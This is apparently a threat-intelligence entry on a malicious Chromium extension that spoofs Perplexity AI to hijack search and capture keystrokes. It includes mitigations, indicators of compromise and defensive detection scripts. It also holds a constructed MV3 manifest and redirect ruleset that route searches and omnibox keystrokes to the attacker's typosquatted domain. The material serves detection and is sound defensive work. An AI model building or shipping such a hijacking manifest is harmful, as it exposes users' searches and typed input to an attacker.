Chromium extension uses AI‑related branding to redirect browser search
Microsoft Threat Intelligence identified a malicious Chromium extension that spoofs Perplexity AI to deceive users into installing it. Its primary objective is search traffic interception and data collection, implemented with Manifest Version 3 capabilities and declarativeNetRequest rules. It routes both full search queries and real-time keystrokes through attacker-controlled infrastructure on a typosquatted domain before redirecting to legitimate search providers. The extension overrides the browser's default search settings, captures user input at the keystroke level, and requests permissions inconsistent with a legitimate AI assistant. The threat shows how actors use AI branding as a social engineering vector. Google removed the extension following responsible disclosure. Organizations should strengthen user awareness training and implement layered security strategies to detect similar threats.
AI Analysis
Technical Summary
Microsoft Threat Intelligence identified a malicious Chromium extension spoofing the Perplexity AI brand to deceive users into installation. The extension's main function was to intercept search traffic and collect data, including real-time keystrokes, using Manifest Version 3 capabilities and declarativeNetRequest rules (the MV3 API through which an extension declares request-matching rules, including redirects, that the browser applies without any extension script running at request time). It routed full search queries and keystrokes through attacker-controlled infrastructure hosted on a typosquatted domain (perplexity-ai.online) before redirecting users to legitimate search providers, so the victim still sees normal search results. The extension also overrode the browser's default search settings and requested permissions inconsistent with legitimate AI assistants. Google removed the extension following responsible disclosure. This campaign illustrates how threat actors use AI-related branding as a social engineering vector.
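To make the mechanism concrete, here is an added example that is neither the extension's actual code nor anything from Microsoft's report: a constructed MV3 manifest and declarativeNetRequest ruleset shaped like the behaviour described above (brand name borrowed, default search provider and a redirect rule pointing at the IOC domain), followed by a static checker a practitioner could run over an unpacked extension. The suggest_url keystroke path, the legitimate-host list for the brand, the rule contents and every name other than the IOC domain are assumptions.

```javascript
// Added example, not the real extension's files: a constructed MV3 manifest and
// declarativeNetRequest ruleset shaped like the hijack described on the page.
// Every URL, name and rule here is an assumption except the IOC domain.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Perplexity AI Assistant",              // borrowed brand name
  version: "1.0",
  permissions: ["declarativeNetRequest", "storage"],
  host_permissions: ["<all_urls>"],
  chrome_settings_overrides: {                   // replaces the default search engine
    search_provider: {
      name: "Perplexity AI",
      keyword: "perplexity",
      search_url: "https://perplexity-ai.online/search?output=firefox&q={searchTerms}",
      // suggest_url is queried on every omnibox keystroke; assumed here as one
      // plausible way keystrokes reach the attacker host.
      suggest_url: "https://perplexity-ai.online/suggest?q={searchTerms}",
      favicon_url: "https://perplexity-ai.online/favicon.ico",
      encoding: "UTF-8",
      is_default: true,
    },
  },
  declarative_net_request: {
    rule_resources: [{ id: "ruleset_1", enabled: true, path: "rules.json" }],
  },
};

// Constructed contents of rules.json: rewrite Google searches to the lookalike host,
// which then forwards to the real engine (the "redirect before legitimate provider" step).
const SAMPLE_RULES = [
  {
    id: 1,
    priority: 1,
    action: {
      type: "redirect",
      redirect: { regexSubstitution: "https://perplexity-ai.online/search/?q=\\1" },
    },
    condition: {
      regexFilter: "^https://www\\.google\\.com/search\\?q=([^&]*)",
      resourceTypes: ["main_frame"],
    },
  },
];

// Brands and the hosts they legitimately use (assumed list for this example).
const BRAND_HOSTS = { perplexity: ["perplexity.ai", "www.perplexity.ai"] };

// Hostname of a URL template, after neutralising {searchTerms} and DNR backreferences.
function hostOf(template) {
  try { return new URL(template.replace(/\{searchTerms\}|\\\d/g, "x")).hostname; }
  catch { return null; }
}

function brandFromName(name) {
  const n = name.toLowerCase();
  return Object.keys(BRAND_HOSTS).find(b => n.includes(b)) || null;
}

// Static checks over an unpacked extension: does a brand-named extension send
// searches, suggestions or redirects to a host that merely contains the brand string?
function analyzeExtension(manifest, rules = []) {
  const findings = [];
  const brand = brandFromName(manifest.name || "");
  const legit = brand ? BRAND_HOSTS[brand] : [];
  const lookalike = h => Boolean(brand && h && h.includes(brand) && !legit.includes(h));

  const sp = manifest.chrome_settings_overrides?.search_provider;
  if (sp) {
    for (const key of ["search_url", "suggest_url", "favicon_url"]) {
      const h = hostOf(sp[key] || "");
      if (lookalike(h)) {
        const note = key === "suggest_url" ? " (receives every omnibox keystroke)" : "";
        findings.push(`search_provider.${key} points at lookalike host ${h}${note}`);
      }
    }
  }
  for (const r of rules) {
    if (r.action?.type !== "redirect") continue;
    const target = r.action.redirect?.url || r.action.redirect?.regexSubstitution || "";
    const h = hostOf(target);
    if (lookalike(h)) {
      const match = r.condition?.regexFilter || r.condition?.urlFilter || "?";
      findings.push(`DNR rule ${r.id} redirects requests matching ${match} to lookalike host ${h}`);
    }
  }
  if ((manifest.host_permissions || []).includes("<all_urls>")) {
    findings.push("host_permissions <all_urls>: far broader than a search assistant needs");
  }
  return findings;
}

// A constructed clean manifest for the same brand produces no findings.
const CLEAN_MANIFEST = {
  manifest_version: 3,
  name: "Perplexity",
  version: "1.0",
  chrome_settings_overrides: {
    search_provider: {
      name: "Perplexity",
      keyword: "perplexity",
      search_url: "https://www.perplexity.ai/search?q={searchTerms}",
      encoding: "UTF-8",
      is_default: true,
    },
  },
};

console.log(analyzeExtension(SAMPLE_MANIFEST, SAMPLE_RULES).join("\n"));
```

The checker is deliberately narrow: it only asks whether a brand-named extension talks to hosts that contain the brand string but are not the brand's own, which is exactly the typosquat pattern in this case. In a review pipeline you would feed it the unpacked manifest.json and each file listed under declarative_net_request.rule_resources.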
Potential Impact
The malicious extension compromises user privacy by capturing keystrokes and search queries, which can expose anything a user types into the address bar or search box. It hijacks the browser's default search settings so that traffic passes through attacker-controlled infrastructure before reaching the legitimate search provider, enabling interception and possible further exploitation, and the typosquatted domain makes the detour easy to overlook. Because this is a malicious extension rather than a software vulnerability, the usual "exploited in the wild" measure does not apply: the extension was publicly distributed until Google removed it. The data interception and keystroke capture pose a medium risk to affected users.
Mitigation Recommendations
Google has removed the malicious extension from the Chrome Web Store following responsible disclosure; no patch applies because this is a malicious extension, not a software vulnerability. Users should review their installed extensions (chrome://extensions), remove any they do not recognise, especially ones using AI brands such as Perplexity AI, and confirm that the browser's default search engine has not been changed. Organizations should strengthen user awareness training to cover social engineering that leans on AI branding, and should apply layered controls: restrict extension installation with Chrome enterprise policies (ExtensionInstallAllowlist / ExtensionInstallBlocklist, or ExtensionSettings), pin the default search provider by policy, block the indicators listed below at the proxy or DNS layer, and monitor for unauthorized changes to browser search settings.
Indicators of Compromise
- domain: perplexity-ai.online
- url: http://perplexity-ai.online/
- url: http://perplexity-ai.online/*
- url: http://perplexity-ai.online/search/
- url: https://perplexity-ai.online/favicon.ico
- url: https://perplexity-ai.online/search/
- url: https://perplexity-ai.online/search?output=firefox&q=
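As an added example (not from the page or from Microsoft's report), the indicator list above can be turned into matchers and run over proxy logs and over a browser profile's default search engine setting. The log line format, the sample lines, the Chrome Preferences key names and the file fragment are constructed assumptions; only the indicators themselves come from the page.

```javascript
// Added example, not from the page or the report: the page's indicators as matchers,
// run over constructed proxy log lines and a constructed Chrome Preferences fragment.
const IOC_DOMAINS = ["perplexity-ai.online"];
const IOC_URLS = [
  "http://perplexity-ai.online/",
  "http://perplexity-ai.online/*",
  "http://perplexity-ai.online/search/",
  "https://perplexity-ai.online/favicon.ico",
  "https://perplexity-ai.online/search/",
  "https://perplexity-ai.online/search?output=firefox&q=",
];

// A domain IOC covers the host itself and any subdomain; a lookalike such as
// www.perplexity.ai does not match.
function hostMatches(host, iocDomain) {
  const h = host.toLowerCase().replace(/\.$/, "");
  return h === iocDomain || h.endsWith("." + iocDomain);
}

// URL IOCs ending in "*" (glob) or "=" (empty query value) are prefixes;
// anything else is an exact match ignoring a trailing slash.
function urlMatches(url, ioc) {
  if (ioc.endsWith("*")) return url.startsWith(ioc.slice(0, -1));
  if (ioc.endsWith("=")) return url.startsWith(ioc);
  const strip = u => u.replace(/\/$/, "");
  return strip(url) === strip(ioc);
}

// Hostname of a URL or search template; null if it cannot be parsed.
function safeHost(template) {
  try { return new URL(template.replace("{searchTerms}", "x")).hostname; }
  catch { return null; }
}

// Constructed proxy log, one request per line: "<timestamp> <client> <method> <url>".
const SAMPLE_LOG = [
  "2026-06-30T10:01:02Z 10.0.0.5 GET https://www.google.com/search?q=quarterly+results",
  "2026-06-30T10:01:03Z 10.0.0.5 GET https://perplexity-ai.online/search?output=firefox&q=quarterly+results",
  "2026-06-30T10:01:04Z 10.0.0.5 GET https://perplexity-ai.online/favicon.ico",
  "2026-06-30T10:02:10Z 10.0.0.7 GET https://www.perplexity.ai/search?q=hello",
  "2026-06-30T10:03:00Z 10.0.0.9 GET http://cdn.perplexity-ai.online/ping",
];

// Returns one hit per log line that matches a URL IOC (preferred) or a domain IOC.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const [ts, client, , url] = line.trim().split(/\s+/);
    const host = url && safeHost(url);
    if (!host) continue;
    const urlHit = IOC_URLS.find(i => urlMatches(url, i));
    const domainHit = IOC_DOMAINS.find(d => hostMatches(host, d));
    if (urlHit || domainHit) hits.push({ ts, client, url, ioc: urlHit || domainHit });
  }
  return hits;
}

// Constructed Chrome Preferences fragment. Chromium stores the active search engine
// under default_search_provider_data.template_url_data; treat the exact key names
// as an assumption to verify against your browser version.
const SAMPLE_PREFS = {
  default_search_provider_data: {
    template_url_data: {
      short_name: "Perplexity AI",
      keyword: "perplexity",
      url: "https://perplexity-ai.online/search?output=firefox&q={searchTerms}",
      suggestions_url: "https://perplexity-ai.online/suggest?q={searchTerms}",
    },
  },
};

// Flag any search-provider field whose host matches a domain IOC.
function auditDefaultSearch(prefs) {
  const t = prefs?.default_search_provider_data?.template_url_data || {};
  return ["url", "suggestions_url", "favicon_url"]
    .filter(k => typeof t[k] === "string")
    .map(k => ({ field: k, host: safeHost(t[k]) }))
    .filter(e => e.host && IOC_DOMAINS.some(d => hostMatches(e.host, d)));
}

console.log(scanLog(SAMPLE_LOG));
console.log(auditDefaultSearch(SAMPLE_PREFS));
```

Two details matter for precision: the domain matcher accepts subdomains of the IOC but not the real perplexity.ai, and the URL matcher treats the `*` entry and the `...&q=` entry as prefixes, because a literal match on a query string that ends in an empty value would never fire on real traffic. Built-in providers such as Google store a templated `url` (for example `{google:baseURL}search?q=...`) that is not a parseable URL, which the audit skips rather than misreports.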
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/
- Adversary: none recorded
- Pulse ID: 6a42d0b89159dccad1ff7879
- Threat Score: none recorded
Threat ID: 6a43a6ca27e9c79719a5445c
Added to database: 06/30/2026, 11:21:46 UTC
Last enriched: 06/30/2026, 11:36:22 UTC
Last updated: 07/01/2026, 02:26:23 UTC